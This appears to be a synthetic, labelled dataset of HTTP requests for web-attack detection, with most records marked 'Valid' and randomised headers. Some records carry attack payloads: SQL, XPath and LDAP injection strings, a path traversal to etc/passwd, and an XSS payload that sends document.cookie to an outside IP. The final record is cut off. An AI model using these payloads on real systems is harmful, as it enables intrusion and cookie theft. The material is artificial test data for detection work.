null

End - Id: 31465
Start - Id: 41421
class: SqlInjection
POST /dvynb6rTte3sdcel7qt/3ll/t8nrGu8mDkK93Jg/atrpe/rl/innroinewt7ya.php? HTTP/1.0
Content-Length: 167
Content-Language: z,tytns
Content-Encoding: gzip
Content-Location: http://www.dbsbulb.st/8bsdsii.mdb
Content-MD5: aXNlb3JkSGNydG5yZGxlNg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Oct 04 20:23:14 CET
Last-Modified: Sat, 15 Mar 08 11:01:58 UTC
Host: www.P3kheju1to.org:21989
Connection: close
Accept: audio/*
Accept-Charset: us-ascii;q=0.4, windows-1251, ks_c_5601-1987;q=0.7, koi8-r
Accept-Encoding: *;q=0.6
Accept-Language: rdalT-ictso
Cache-Control: max-stale
Client-ip: 83.0.8.151
Cookie: 8rfos=snUtoneg;nttr57pntlvct=54021484;ts2es1ih=in2mftpk
Cookie2: $Version="458"
Date: Wed, 20 Jan 10 06:46:00 CET
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: 100-continue
From: eznB@Adtctleba.uk
If-Modified-Since: Thu, 28 Jan 10 07:51:02 UTC
If-Unmodified-Since: Thu, 11 Feb 10 04:25:01 UTC
If-Match: *
If-None-Match: "ovDEwK4quk4sKKVf"
If-Range: Tue, 13 Jan 04 24:40:54 GMT
Max-Forwards: 3197
MIME-Version: 2.2
Pragma: 91='usotmi'
Proxy-Authorization: NTLM c2l0OGZsbXJxZUttemxlMG5hdGh1cG9zZmVzcnJ1ZWVlaHNoa2dueU1Oa3R0cg==
Authorization: Basic c29hczpobzRUYm0yMA==
Range: 4509-,62-022408,-4198
Referer: http://www.as3oly.uk/lgrEfns/rSsgtneu/lgbt60cr/ranhm.ace
TE: chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.7 (Machintosh; U; PPC Mac OS X 6.6; 0a-eu; rv:6.7.6) Gecko/12090936
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 738x118
Via: HTTP/7.0 75.54.21.253:1
Transfer-Encoding: pvncl
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 9168693821015244526
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

irl7g9ksiftoEa=[swabgsoundetcasfse&emir1oaiHt='     /**/     OR  /**/''    = '&rt=blKVSx.HGI&@Gchildi=ggsnjHpzFj&nn=eTFDaXW@X&aeJcofh=y|&Ult6=5

End - Id: 41421
Start - Id: 17465
class: Valid
GET /d-.PLdeletepasswdH/tecPds4n/xbdTkWD6Txk3Sa/sd/nblbll/eohtibaRjrrfEeov/i2ne1ag/lcTr1/-9/sn.css? HTTP/1.1
Host: www.doed7rsp.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 108.240.37.46
Cookie: wEryoa5he=xEJ.
Cookie2: $Version="0"
Date: Tue, 26 May 09 06:24:07 GMT
ETag: W/"wwzVnNS03xofgYt"
Expect: aunieea5
From: fl3dcevm@tehetciOc.ch
If-Modified-Since: Wed, 10 May 06 04:28:07 CET
If-Unmodified-Since: Sat, 26 Nov 05 24:11:26 GMT
If-Match: "@PEhNeE1VxDONJwJyohy"
If-None-Match: "LO0SGWeuk60S@mvqp9gK"
If-Range: Sun, 11 Apr 10 01:34:32 GMT
Max-Forwards: 943
MIME-Version: 0.4
Pragma: unseNft=nie
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: t3nots ooc9dh=0eTrxa
Range: -46060,-501912,285072-125
Referer: http://poixseq.uk/srAzI/rar7ial/qtn9yi/7sanwl/ulfsu.txt
TE: chunked,deflate;q=0.5,deflate;q=0.2
Trailer: Cache-Control
User-Agent: inD4Bf6kHm http://www.n58tnahl.net
UA-CPU: MIPS
UA-Disp: 5103,184,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 767x663
Via: 7.5 www.xroeeee.jpg
Transfer-Encoding: compress
Upgrade: 8yndaa/8.9, dn8nen/3.7
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 191.66.107.216
X-Serial-Number: 4864116530046414
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17465
Start - Id: 14836
class: Valid
GET /hymlaot4tLohbo/ySGEh7Lu/link2b0NY0boot.initmpj/cyArvscriptT/iUoie/ennblHa6yhou5rscusia/tx9nlHR7pmmQXih_.asp? HTTP/1.0
Host: 185.231.59.28
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ko4whR-evn7esi;q=0.8
Cache-Control: no-store
Client-ip: 35.5.220.119
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="33"
Date: Wed, 21 May 08 16:33:11 CET
ETag: "cl9MF-53YBh2BP.F"
Expect: twite3=uetN
From: se5tmG@5hndem.ch
If-Modified-Since: Mon, 04 Sep 06 16:43:52 GMT
If-Unmodified-Since: Thu, 28 Jun 07 18:47:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jul 08 09:30:44 CET
Max-Forwards: 896
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: niosi tjsll=y4sneodh
Authorization: Digest username="iAr14"
Range: -67,057-805,-3
Referer: http://soratuhd.uk/tqitumh.asp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: rIhiis
UA-CPU: 68000
UA-Disp: 1041,483,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 923x8805
Via: 2.9 9.97.39.180, HTTP/2.2 www.xfiaenQd.htm:8
Transfer-Encoding: deflate
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 89813
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14836
Start - Id: 30517
class: Valid
GET /actc/7Ud/hTowrvuhoy/csinceei/Z9fV@TM5q/luj2/RDJfQ@T/7d/a-uhMEG3saqrLHX1G.gif?Sp=8477463&pglrherrNsp=ohvOa1tt5eoteebaam&px0=oTto%7E9atee9&e8s6=froraeacsu%3Am+n HTTP/1.0
Host: www.itSbie1e8r.de:89
Connection: rfd0o
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, compress;q=0.6
Accept-Language: *
Cache-Control: htmrnlti='lr'
Client-ip: 45.61.175.245
Cookie: aji=nehoratB;eayShoxetjpn3=enp6aeahu;asHrobesuwsr=om
Cookie2: $Version="21"
Date: Sat, 19 Apr 08 10:47:14 CET
ETag: "gAoh1dXS@b.aUzyorSs"
Expect: hseef1s=i5gaS
From: zzlwh@fLsr.de
If-Modified-Since: Thu, 04 Jun 09 16:52:06 UTC
If-Unmodified-Since: Wed, 21 Feb 07 10:40:39 CET
If-Match: "7O9OO09-0B3r1.aWHUnv"
If-None-Match: *
If-Range: Tue, 31 Aug 04 11:38:35 GMT
Max-Forwards: 650
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic aVJocmU6dW9nbXNp
Authorization: tbdla tTrtjroc=eYccll
Range: 6-,-0
Referer: /hrow6o/tleamhs/swhres/edafoe.bin
TE: gzip;q=0.6,trailers
Trailer: Transfer-Encoding
User-Agent: 1sh42rmeiaunasIn2rc
UA-CPU: 68000
UA-Disp: 7538,1606,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 848x9139
Via: FTP/7.8 53.14.91.243, dse/4.1 9.45.87.249, HTTP/2.9 135.174.2.116
Transfer-Encoding: deflate
Upgrade: 5rir/1.2, ag6/9.0, lli/9.6, ihcn/5.0
Warning: 154 95.111.78.82 "snmChTa3n" 
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30517
Start - Id: 14150
class: Valid
GET /cqaOG67ru/e67IpaWHf20W8Vx@K-4/Tloy5rs6xr/ny5SftsrfeoAI3tfia/FG6daKzoers/isxtwhoytmgMennae/ft/moteech.shtml?O-KT.e@R5QC.=rAM4Ogw&asb=1HvaN&hmmn2hhTze1yt=%40sgeocfstyd2&Twi=92105579 HTTP/1.1
Host: 99.33.89.170
Connection: iekz
Accept: text/plain;q=0.7, audio/basic;q=0.9
Accept-Charset: windows-1255, euc-kr;q=0.8, iso-8859-2
Accept-Encoding: compress, identity
Accept-Language: uvhaO0-vVz;q=0.9, S-ciahq, ft7aPN-rh, hEncAlta-ae6, ihmh-ye
Cache-Control: max-stale
Client-ip: 153.229.137.71
Cookie: cdtefo=l-MeV;irotc=qnd
Cookie2: $Version="66"
Date: Sun, 03 Feb 08 23:33:52 UTC
ETag: "UEVmFw97@yrz7UMGZmRF"
Expect: XTCr
From: zess@lSzAtt.de
If-Modified-Since: Fri, 27 Jul 07 24:02:03 UTC
If-Unmodified-Since: Thu, 11 May 06 24:38:02 GMT
If-Match: "zBK8Ow97qQ5MHuN"
If-None-Match: "P2t@rE929SH.X.er"
If-Range: Thu, 01 Jan 09 03:37:01 UTC
Max-Forwards: 597
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic TGJyc3I6N281ZTRycw==
Authorization: tAZro tdcY=eewf
Range: -395
Referer: /5Uec0nit/als3a0.swf
TE: gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: 52oiai9r (axRGnQQhf8; t__OEfBuo; sRMh4bYW; sxxWvu; 6lSDyi6)
UA-CPU: x86
UA-Disp: 946,473,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5343x014
Via: FTP/5.5 www.teba.js, HTTP/8.0 www.egnF.js, 4.4 www.fmeeyett.gif
Transfer-Encoding: gzip
Upgrade: e2es/4.2, i4o/1.0, H5unol/4.6, puffs/2.0
Warning: 166 42.97.253.158 "rwatpa" 
X-Forwarded-For: 126.23.131.140
X-Serial-Number: 8863769
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14150
Start - Id: 16698
class: Valid
GET /BF4evalN5AwhomeNC/y3tesnd5t.sh?aNerioaq=aorv2noI2Tka4sw4&wL8M@lR=hfcrptrajeP7lnad&8i0e1Quowon=izmle HTTP/1.1
Host: www.rf04xue.be
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=65339
Client-ip: 171.36.209.57
Cookie: DaKKftptelnetf@x0=2taSoerelrlo;ncthiio26ai=1m@e2)aeo;tt=se353a
Cookie2: $Version="810"
Date: Mon, 09 Jan 06 04:21:42 UTC
ETag: "M5uXp5W.8Kidj00P"
Expect: 100-continue
From: xtia2En@szyakI.st
If-Modified-Since: Wed, 25 Mar 09 15:55:50 GMT
If-Unmodified-Since: Sun, 15 Oct 06 21:29:56 GMT
If-Match: "U.ruBF8a3hwkpVSm"
If-None-Match: *
If-Range: "Yn_nfw39VPvO28L@Sfv"
Max-Forwards: 8
MIME-Version: 2.5
Pragma: x=sthrst
Proxy-Authorization: Digest username="igsho"
Authorization: Basic dUV0dHR3blQ6ZXhhcnM=
Range: 735-128151,-280736
Referer: /teed/aty7/oaay/t5bw5oe.jpeg
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Oetsam/2.3.5.3.9
UA-CPU: 68000
UA-Disp: 7604,2520,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 069x5289
Via: 6.5 www.tfOtdRsZ.shtml
Transfer-Encoding: deflate
Upgrade: Tsfd/4.9, nlirha/8.6, rducee/0.6, ela/8.7
Warning: 930 96.102.226.255 "rmts" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 88173
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16698
Start - Id: 48640
class: XPathInjection
PUT /Nuf5RaR_varUWUE/e78UbjVZOqr5t/NTCZx/cOpwwnUQphAD0xzmxc9/dbLeUi@sJJp/sDOhnzyyEwe8ihnilmi/tG-G3/e4e.js? HTTP/1.0
Content-Length: 234
Content-Language: eec,wyyt3e
Content-Encoding: identity
Content-Location: http://nzeo.org/phtvdA/8autmi/6auitr.php
Content-MD5: aGF3dmZTMmRvYXN0aXVkNA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 22:41:37 GMT
Last-Modified: Mon, 21 Jul 08 15:39:47 GMT
Host: www.ueoSda.be
Connection: aDodeun
Accept: video/mpeg;q=0.2, image/*;q=0.6, application/*
Accept-Charset: koi8;q=0.1, x-mac-japanese
Accept-Encoding: compress;q=0.9, gzip, deflate;q=0.8, identity;q=0.2
Accept-Language: 5Tsr8Bsf-sa;q=0.6, edca-shrle;q=0.8, ehtoi9-sebngs6n, pj0-Pseaattb, se0wdh-peBWm
Cache-Control: no-store
Client-ip: 41.88.127.250
Cookie: SI6xmlIhU=6889386;xen6cnc=m"i4cIlipobjectoOSs]rr;btI5htii=8854978
Cookie2: $Version="469"
Date: Thu, 09 Apr 09 08:58:36 GMT
ETag: W/"YKFJkoH9cKAkRI90WU"
Expect: 100-continue
From: yjto@xsql9otwn.de
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Fri, 12 May 06 14:36:12 GMT
If-Match: "2-vFgtBqUjYJOxa"
If-None-Match: *
If-Range: Tue, 18 Jul 06 06:34:57 GMT
Max-Forwards: 3520
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bGFhZTpubFJpMG5lYw==
Range: -046912,8351-4,007308-22
Referer: http://hoaya.org/yreuxgeu/uta6Sn9i/dnwl/stsrg.sh
TE: gzip;q=0.1,trailers
Trailer: Range
User-Agent: Mozilla/1.9 (Windows; U; WinNT 4.6; rT-aO; rv:0.2.6) Gecko/75663911
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: FTP/8.3 www.u3ldr.html
Transfer-Encoding: compress
Upgrade: ohth/5.2
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mFLCxterm@wm0b5I=a&stEhac4rio=e&dw=nyyRhavingi9taPdka~&gLv_M=nmAc1&wAk1ppoH=lSxpMX_Xum&eeegrtuuy3aN=317  or 1<     nse/pb/hee/child::text()[position()=0]     or  096='] | /* | /foo[bar='

End - Id: 48640
Start - Id: 29350
class: Valid
GET /bnd_TjKS/rSaKS/sdecKftWhtnwbgahente/eedeitqwkIaiey5q2/g7c2.pl?e6mIeo=e67&passthrutelnetzcwinnt6i67=exG4uEjBcv&.yNld4UBQ=dest&a2jba4wei=c&d88qfeweo=tX9_i.wmnDw5&7g4acecat=ynbagemkTnt&l9elborft3reEs=naeNod5Tnoo1b HTTP/1.1
Host: www.zhiex.org
Connection: peaso3tr
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, identity, compress;q=0.0, identity
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 134.100.222.56
Cookie: -CCv-7xG=rdl;7ottotshE=aet1rarcp3 Rtuu=;uymetfde=style;ee8rsn8=4sieLSD;M_WTHx_S=c0xYuuU6hzut;hCeut9le=tt
Cookie2: $Version="038"
Date: Sun, 07 Feb 10 21:30:02 UTC
ETag: "I6lod4.WkBxa_3R"
Expect: 100-continue
From: huEdao@sesefui5t.biz
If-Modified-Since: Mon, 17 Sep 07 19:31:18 GMT
If-Unmodified-Since: Tue, 01 Jul 08 09:05:43 CET
If-Match: *
If-None-Match: "mFXGNLsrU6Xkl2FYkWso"
If-Range: Sun, 02 Jul 06 15:49:10 CET
Max-Forwards: 48
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic U2E5bzpTb2VoMGN0Mg==
Authorization: enzrm meGqad=cjltE
Range: 415-76250
Referer: http://yrnt.uk/Mnixpv/dhie.pl
TE: gzip;q=0.5
Trailer: Host
User-Agent: tnnEibnEmohH
UA-CPU: PowerPC
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7326x099
Via: ejeHa6/8.8 89.83.181.39, HTTP/9.7 71.216.247.104, 5.3 97.79.89.58
Transfer-Encoding: uambf
Upgrade: eete/7.2
Warning: 340 213.231.43.122 "dlas45wtieaow8l" "Tue, 29 Dec 09 20:43:56 UTC"
X-Forwarded-For: 41.177.120.181
X-Serial-Number: 725402
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29350
Start - Id: 9732
class: Valid
GET /mail7ExFUsl4A4/0i/Acmmnir/cZlfSm9s9g1h6u/be/uCzTqQ8_ax8/l8nioesfheZ/flltlsoia/sg/eiitadtb/@d@w2-8Yj/w9c8.png? HTTP/1.0
Host: 8.203.157.133
Connection: keep-alive
Accept: audio/*, image/*, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=942
Client-ip: 12.243.237.11
Cookie: nlQet8oupts=execexp_F@(av &sG1vtmp
Cookie2: $Version="47"
Date: Thu, 16 Mar 06 05:51:36 UTC
ETag: W/"4_inudS.HycaZvu"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Sun, 29 Mar 09 06:38:14 UTC
If-Unmodified-Since: Wed, 18 Jan 06 22:56:35 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 84
MIME-Version: 9.0
Pragma: n=emeeam
Proxy-Authorization: NTLM U25yenYwYXNodXNoYnNhSXJlb2RmZDhhT2llZHZub2Fwb0NuaExybA==
Authorization: Basic bWRsRTk6cmF4bW1hdWw=
Range: 56419-6047,31908-,-5753
Referer: http://www.2nrvlE.it/ooAda/teenrSEs/turetT0/ete7iue/om1aev.exe
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept-Language
User-Agent: sodsicOc/5.8.0.6
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6817x021
Via: teer/2.5 228.215.98.23:52896
Transfer-Encoding: tteru; archct=y7lSH
Upgrade: hie5vn/0.3
Warning: 820 88.67.174.126 "oueorncn" "Fri, 18 Feb 05 24:11:21 CET"
X-Forwarded-For: 156.177.170.9
X-Serial-Number: 923223228785764
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9732
Start - Id: 38854
class: LdapInjection
GET /thttps8Ss6inJD/n-l_ybBjcWhst3nrKV_/ijeiit5aao/cst0a5/d_mBd2ADBrX/Nservicesba/ezyNu9sw-_84CjSf36/tWlocation0bsslocationC.UG/1i09P/ngsTNaidsjda.nsf?obyiiihgohwn=619916&3YMR=%29++%28+++%7C++%28displayName%3Dhad*%29++%28name+%3D+++had*%29%28+mail%3Dhad*++%29 HTTP/1.0
Host: 116.165.130.86
Connection: ef7att
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 149.133.119.108
Cookie: totduzyQas2ahN6=os;IbiEs3Ddo=2537541775
Cookie2: $Version="36"
Date: Mon, 17 Oct 05 07:18:29 GMT
ETag: W/"@7Yjn8ZE2@SsNW_j"
Expect: beeepata=O503do;rmagetie
From: tdusret@b5koNnc.biz
If-Modified-Since: Mon, 03 Aug 09 06:33:40 GMT
If-Unmodified-Since: Thu, 14 Oct 04 20:37:29 CET
If-Match: *
If-None-Match: "T4_zXOW8gGRpa2pA"
If-Range: *
Max-Forwards: 2698
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Ym9pbk1uZWh0MnJzdXZsZXk1dXRETjdlZXlvdG50aEJlcXdzaWNtaWRYbnU=
Range: -909693
Referer: http://ts0jP.com/elaN/bee4HRl/tttne.wmn
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.3 (X11; U; SunOS sun4u 3.0; tr-fs; rv:6.7.7) Gecko/14663782
UA-CPU: 68000
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9479x714
Via: 9.2 www.EmfvseSe.shtml, 5.6 www.utme.png
Transfer-Encoding: gzip
Upgrade: O88/7.9, ieosN/1.3, eTtno/0.5, aah/4.6
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38854
Start - Id: 46143
class: PathTransversal
GET /2Mgb6b/8he/sqhlgNtHtslhwRfmr.nsf?Bw-Y2tN4=e&PivJZOs0qrGo=528640&wrntoeSneid=9892801589&XxRw9etc=var9vwgetasyrNhmttededl+c&wotroahsc4rsct9=58195&lerbiiwsv8llO3n=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&httLdiarmsz9ud=9628685&qo=e27&1h3ue7o8ieiye=s&oifetts2t5=uDattsAsTinebofd&ingwiphx3wvoe=iOtealo&2gWNautoexecpt=8927&Zhtpass4x9Br=9&fmtteknc6uar=55066774&jBG5n1=7037805 HTTP/1.1
Host: www.apVe1.cz:61
Connection: mottE
Accept: */*
Accept-Charset: windows-1257;q=0.4, x-mac-hebrew, iso-2022-jp, windows-1253
Accept-Encoding: deflate, deflate
Accept-Language: 2i9-7peSa, otl-Sdi, 21n-tas1azbF;q=0.1, z-5g, Eds5-vFMs6
Cache-Control: epssdte='1aten'
Client-ip: 219.211.206.215
Cookie: iTa6Iteudn=98655510;ei1iclv3=ol
Cookie2: $Version="9"
Date: Fri, 13 Jun 08 05:36:23 GMT
ETag: W/"Awz51aejRXkRDAiXh6"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sat, 23 Jun 07 14:26:28 CET
If-Unmodified-Since: Wed, 02 Feb 05 05:24:53 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 05
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: 9bHR aNt8n=lOa8lr0
Authorization: aror iyeebrdb=SAau
Range: -526467,43-,829-431383
Referer: /itctlk.exe
TE: chunked,deflate,chunked
Trailer: Upgrade
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 6.3; nh-is; rv:4.4.3) Gecko/93292293
UA-CPU: x86
UA-OS: Linux
Via: 0.6 96.168.178.251
Transfer-Encoding: gzip
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 167 60.70.73.146 "Bech10nim" "Wed, 08 Feb 06 20:07:02 UTC"
X-Serial-Number: 678023085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46143
Start - Id: 38630
class: LdapInjection
GET /1epfd6innaih3ssoci/umUg6YXSkd8_h/uXeoGH/l8.jpeg?ed=%29+%28+++%7C+%28displayName%3Dhad*%29%28name+%3D+++had*++%29%28++mail%3Dhad*++++%29&emaAm=noe+oqq HTTP/1.1
Host: 218.10.222.73
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress, deflate;q=0.8, gzip;q=0.8, deflate;q=0.9
Accept-Language: aoKsrTt-eardaeh;q=0.0
Cache-Control: min-fresh=9
Client-ip: 146.74.202.69
Cookie: mileWdEy=ol;rfeZlewcge3teo=7937311;DeOe3s=wnvniimh3onx
Cookie2: $Version="225"
Date: Wed, 04 Mar 09 07:19:00 UTC
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Fri, 18 Feb 05 03:24:27 CET
If-Unmodified-Since: Sun, 18 Sep 05 08:53:45 GMT
If-Match: "j8tBmasV8PoJm6Eupz.T"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: Sat, 17 Nov 07 05:10:21 UTC
Max-Forwards: 1
MIME-Version: 8.5
Pragma: 9l3b='l16tnr'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: 5r7i ideon=rrdeiim
Range: 2-163
Referer: http://eroueah.biz/bee6t/TGleltm/nalp/T3tga/qipcelme.wmn
TE: gzip;q=0.8
Trailer: Accept
User-Agent: partrnctbio
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: 9.2 www.rfxEnct.shtml
Transfer-Encoding: identity
Upgrade: hiaeAa/4.4, r8ta/3.6, rte3z/8.6, iadrea/0.5, ia5gs/1.7
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 53440991
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38630
Start - Id: 47468
class: XSS
GET /mgigifsi/Lln3sthnecObaIonhz/Nhr/unps7sn/fbdacebaiotiocrpaQev/9IO1S8l/qsystemO_QUform-T19W/n.kYMrMm_zJ.jsp?r2aartYerioM=aS7fstepphcJmio&rvtcv=74035&ieu=vZw&yn=%3Cimg+++src+++%3D+++%22javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F69.114.156.135%2Friri.mspx%27%2Bdocument.cookie%29%3B%5D+++%22++%3E&seehLw=71444&ckne=462&Qh6ahyaac=i+aqmoIbuhtfon&ats=ft+stdinps&sgdlraiNjts2qh=+h&q2=nrKC0Py&SBlVQ9Xk=enJrlAKh&3qeee3ntHn=3toi&daeimgosco=6152951&V73-2R-npp=rAmctN&behlt7Oia=nnetoeetlsn HTTP/1.1
Host: 24.94.51.83
Connection: close
Accept: image/*, video/quicktime;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: fe-re;q=0.2, nfi-i9Hitn;q=0.7
Cache-Control: only-if-cached
Client-ip: 227.166.219.20
Cookie: qAnebshlvae0ue=t6Q2P
Cookie2: $Version="37"
Date: Tue, 07 Aug 07 11:56:44 GMT
ETag: W/"PWr_P0lK@gC5jou"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Wed, 11 Oct 06 07:18:41 GMT
If-Unmodified-Since: Sat, 08 Aug 09 13:59:09 CET
If-Match: *
If-None-Match: "IZ0410daHeiPQLJ@A"
If-Range: Wed, 07 May 08 07:22:11 UTC
Max-Forwards: 20
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest algorithm=MD5-sess
Range: 307-,052-4971
Referer: http://www.ttqe5oH.be/BalhwT/hse2/eErezi.png
TE: trailers,trailers,gzip;q=0.0
Trailer: From
User-Agent: hulfTev0d7btK
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4671x382
Via: 8.4 128.0.194.210
Transfer-Encoding: inr33
Upgrade: rshhh0/1.3
Warning: 434 www.stheqS.htm "2se9l4zCow3t" "Tue, 16 Nov 04 07:44:37 CET"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47468
Start - Id: 19379
class: Valid
GET /rQ0tzrvbL9sNDjyE0/yj1VSkfFBaa/uAhusMLGrHsnsXOpzZn/LDY5w/11husaph7etqse/bgxrq7Y1J9iJCO/eya3rYyxUo14xhche/ENbbiwds3hsrflte/et3yt.sh?7algrrs=mpssreipr HTTP/1.1
Host: www.l49I.cz
Connection: keep-alive
Accept: audio/*;q=0.1
Accept-Charset: x-mac-arabic;q=0.5, x-mac-arabic;q=0.1
Accept-Encoding: 
Accept-Language: 5tsgr3-ewsu;q=0.9, bkhdcheo-d;q=0.3, l4enad-ds
Cache-Control: max-age=7503
Client-ip: 146.173.1.184
Cookie: slHgx=)ftposU2iframeeae;hE3apvun2icT9s=94855;htetreadrescctk=63;7eews=3EqRJel.8
Cookie2: $Version="986"
Date: Sun, 23 Dec 07 15:26:46 UTC
ETag: "P_os1ZQBsowLAQQvfAp"
Expect: 100-continue
From: tsVcgauE@1dexxyupd.de
If-Modified-Since: Thu, 27 Nov 08 19:56:28 CET
If-Unmodified-Since: Sat, 16 Jan 10 15:00:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Sep 07 01:57:37 CET
Max-Forwards: 2118
MIME-Version: 5.2
Pragma: e4=k2rfs
Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: eUUe sxpfh=eias
Range: 424-5049
Referer: /15eid4G/oe6u9.swf
TE: deflate;q=0.9,gzip;q=0.1,trailers
Trailer: Accept-Language
